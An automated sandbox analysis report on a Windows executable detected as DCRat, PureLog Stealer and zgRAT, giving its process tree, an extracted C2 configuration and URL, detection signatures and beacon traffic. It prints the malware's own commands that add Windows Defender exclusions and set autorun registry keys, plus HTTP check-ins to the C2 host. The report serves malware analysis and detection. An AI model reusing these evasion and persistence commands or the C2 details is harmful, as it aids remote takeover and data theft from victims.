Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
EQdhBjQw4G.exe

Overview

General Information

Sample name:EQdhBjQw4G.exe
renamed because original name is a hash value
Original sample name:477DB3DE46B7779B63495A8BDB279F2C.exe
Analysis ID:1549799
MD5:477db3de46b7779b63495a8bdb279f2c
SHA1:77dc3f7d83728294c49298db82dd0e668adc3a73
SHA256:8b0b6f7ba3c1c98fdc17ceb74e37057793e104dc92aa4d4319d71411b3e56366
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • EQdhBjQw4G.exe (PID: 908 cmdline: "C:\Users\user\Desktop\EQdhBjQw4G.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
    • csc.exe (PID: 2056 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 5012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 3616 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES790E.tmp" "c:\Windows\System32\CSCF98670F718C4420FABE8D0275D85BFD.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 4828 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3616 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7976 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 2256 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1148 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7176 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7220 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\EQdhBjQw4G.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7524 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nQeR8AonhE.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7700 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7836 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • RuntimeBroker.exe (PID: 8180 cmdline: "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • svchost.exe (PID: 7440 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • RuntimeBroker.exe (PID: 1216 cmdline: "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • EQdhBjQw4G.exe (PID: 3696 cmdline: "C:\Users\user\Desktop\EQdhBjQw4G.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • RuntimeBroker.exe (PID: 7776 cmdline: "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • EQdhBjQw4G.exe (PID: 2228 cmdline: "C:\Users\user\Desktop\EQdhBjQw4G.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • RuntimeBroker.exe (PID: 1376 cmdline: "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • EQdhBjQw4G.exe (PID: 5264 cmdline: "C:\Users\user\Desktop\EQdhBjQw4G.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe (PID: 3384 cmdline: "C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • RuntimeBroker.exe (PID: 2112 cmdline: "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • EQdhBjQw4G.exe (PID: 4556 cmdline: "C:\Users\user\Desktop\EQdhBjQw4G.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal", "MUTEX": "DCR_MUTEX-fMqIIZ3msKTluYQzOgJz", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
EQdhBjQw4G.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    EQdhBjQw4G.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 3 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000000.1639490533.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000000.00000002.1721488427.0000000013331000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    Process Memory Space: EQdhBjQw4G.exe PID: 908JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Process Memory Space: RuntimeBroker.exe PID: 8180JoeSecurity_DCRat_1Yara detected DCRatJoe Security

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        0.0.EQdhBjQw4G.exe.df0000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                          0.0.EQdhBjQw4G.exe.df0000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Execution from Suspicious Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Default User\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe" , CommandLine: "C:\Users\Default User\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, NewProcessName: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, OriginalFileName: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\Default User\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe" , ProcessId: 6104, ProcessName: ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                            Sigma detected: Files With System Process Name In Unsuspected Locations
                            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\EQdhBjQw4G.exe, ProcessId: 908, TargetFilename: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe
                            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\EQdhBjQw4G.exe", ParentImage: C:\Users\user\Desktop\EQdhBjQw4G.exe, ParentProcessId: 908, ParentProcessName: EQdhBjQw4G.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe', ProcessId: 4828, ProcessName: powershell.exe
                            Sigma detected: System File Execution Location Anomaly
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe" , CommandLine: "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, NewProcessName: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, OriginalFileName: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nQeR8AonhE.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7524, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe" , ProcessId: 8180, ProcessName: RuntimeBroker.exe
                            Sigma detected: CurrentVersion Autorun Keys Modification
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\EQdhBjQw4G.exe, ProcessId: 908, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ROxqvkhuKqPawtyxZXXxveaCsizbJ
                            Sigma detected: CurrentVersion NT Autorun Keys Modification
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\EQdhBjQw4G.exe, ProcessId: 908, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                            Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\EQdhBjQw4G.exe", ParentImage: C:\Users\user\Desktop\EQdhBjQw4G.exe, ParentProcessId: 908, ParentProcessName: EQdhBjQw4G.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.cmdline", ProcessId: 2056, ProcessName: csc.exe
                            Sigma detected: Powershell Defender Exclusion
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\EQdhBjQw4G.exe", ParentImage: C:\Users\user\Desktop\EQdhBjQw4G.exe, ParentProcessId: 908, ParentProcessName: EQdhBjQw4G.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe', ProcessId: 4828, ProcessName: powershell.exe
                            Sigma detected: Dynamic CSharp Compile Artefact
                            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\EQdhBjQw4G.exe, ProcessId: 908, TargetFilename: C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.cmdline
                            Sigma detected: Non Interactive PowerShell Process Spawned
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\EQdhBjQw4G.exe", ParentImage: C:\Users\user\Desktop\EQdhBjQw4G.exe, ParentProcessId: 908, ParentProcessName: EQdhBjQw4G.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe', ProcessId: 4828, ProcessName: powershell.exe
                            Sigma detected: Windows Processes Suspicious Parent Directory
                            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7440, ProcessName: svchost.exe

                            Data Obfuscation

                            barindex
                            Sigma detected: Dot net compiler compiles file from suspicious location
                            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\EQdhBjQw4G.exe", ParentImage: C:\Users\user\Desktop\EQdhBjQw4G.exe, ParentProcessId: 908, ParentProcessName: EQdhBjQw4G.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.cmdline", ProcessId: 2056, ProcessName: csc.exe

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-11-06T03:37:17.712560+010020229301A Network Trojan was detected20.12.23.50443192.168.2.449731TCP
                            2024-11-06T03:37:57.199859+010020229301A Network Trojan was detected20.109.210.53443192.168.2.449784TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-11-06T03:37:15.592448+010020480951A Network Trojan was detected192.168.2.44973037.44.238.25080TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus / Scanner detection for submitted sample
                            Source: EQdhBjQw4G.exeAvira: detected
                            Antivirus detection for URL or domain
                            Source: http://861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.phpAvira URL Cloud: Label: malware
                            Antivirus detection for dropped file
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Users\user\AppData\Local\Temp\nQeR8AonhE.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Found malware configuration
                            Source: 00000000.00000002.1721488427.0000000013331000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal", "MUTEX": "DCR_MUTEX-fMqIIZ3msKTluYQzOgJz", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                            Multi AV Scanner detection for dropped file
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeReversingLabs: Detection: 65%
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeVirustotal: Detection: 52%Perma Link
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeReversingLabs: Detection: 65%
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeVirustotal: Detection: 52%Perma Link
                            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeReversingLabs: Detection: 65%
                            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeVirustotal: Detection: 52%Perma Link
                            Source: C:\Users\user\Desktop\CnTGBqTF.logReversingLabs: Detection: 23%
                            Source: C:\Users\user\Desktop\vTqzCdqK.logReversingLabs: Detection: 23%
                            Source: C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeReversingLabs: Detection: 65%
                            Multi AV Scanner detection for submitted file
                            Source: EQdhBjQw4G.exeReversingLabs: Detection: 65%
                            Source: EQdhBjQw4G.exeVirustotal: Detection: 52%Perma Link
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Machine Learning detection for dropped file
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\nmJRokpY.logJoe Sandbox ML: detected
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeJoe Sandbox ML: detected
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\FpFoWZYA.logJoe Sandbox ML: detected
                            Machine Learning detection for sample
                            Source: EQdhBjQw4G.exeJoe Sandbox ML: detected
                            Source: EQdhBjQw4G.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            Source: EQdhBjQw4G.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.pdb source: EQdhBjQw4G.exe, 00000000.00000002.1680880366.0000000003B7D000.00000004.00000800.00020000.00000000.sdmp

                            Spreading

                            barindex
                            Infects executable files (exe, dll, sys, html)
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49730 -> 37.44.238.250:80
                            Uses ping.exe to check the status of other devices and networks
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: Joe Sandbox ViewIP Address: 37.44.238.250 37.44.238.250
                            Source: Joe Sandbox ViewASN Name: HARMONYHOSTING-ASFR HARMONYHOSTING-ASFR
                            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49731
                            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49784
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 384Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
